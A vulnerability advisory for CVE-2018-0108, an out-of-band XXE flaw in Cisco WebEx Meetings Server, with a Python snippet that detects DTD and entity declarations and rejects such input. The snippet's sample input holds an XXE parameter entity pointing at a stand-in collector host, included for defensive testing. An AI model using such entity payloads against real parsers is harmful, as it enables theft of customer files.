XXE attack in Cisco WebEx Meetings Server - CVE-2018-0108

 


Published: January 18, 2018


Vulnerability identifier: #VU10100
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear
CVE-ID: CVE-2018-0108
CWE-ID: CWE-611
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: Cisco Systems, Inc
Affected software:
Cisco WebEx Meetings Server

Detailed vulnerability description

The vulnerability allows a remote authenticated attacker to conduct an XXE attack.

The vulnerability exists because an attacker is able to perform an out-of-band XML external entity (XXE) injection. A remote attacker can capture customer files and redirect them to another destination address to discover sensitive customer data.

Successful exploitation of the vulnerability results in information disclosure.
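
CWE-611 issues of this kind depend on an XML parser accepting a DTD that declares external entities. The following is an added example (not Cisco's code and not part of the original advisory) that uses Python's standard expat bindings to flag such declarations in untrusted XML without resolving them. The function names, sample documents and the example.invalid host are constructed for illustration, and it assumes the receiving service never needs DTDs.

```python
import xml.parsers.expat as expat

# Constructed sample inputs (not taken from the advisory).
CLEAN = b'<?xml version="1.0"?><order><id>42</id></order>'
SUSPECT = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [\n'
    b'  <!ENTITY % ext SYSTEM "http://collector.example.invalid/x.dtd">\n'
    b']>\n'
    b'<order><id>42</id></order>'
)


def dtd_findings(xml_bytes):
    """Return (kind, name, system_id) for every DTD construct in the document.

    The expat parser only reports declarations to the handlers below; it
    performs no file or network access, so nothing external is resolved.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # Parameter entities with a system id are the usual carrier for
        # out-of-band XXE; general entities are reported as well.
        kind = "parameter-entity" if is_param else "general-entity"
        findings.append((kind, name, sysid))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)
    return findings


def accept(xml_bytes):
    """Accept only well-formed XML that carries no DTD at all."""
    try:
        return not dtd_findings(xml_bytes)
    except expat.ExpatError:
        return False  # malformed input is rejected, not passed downstream


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, accept(doc), dtd_findings(doc))
```

The findings list can be logged alongside the rejected request so that repeated system identifiers pointing at unfamiliar hosts are visible to monitoring.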


How to mitigate CVE-2018-0108

Install the update from the vendor's website.
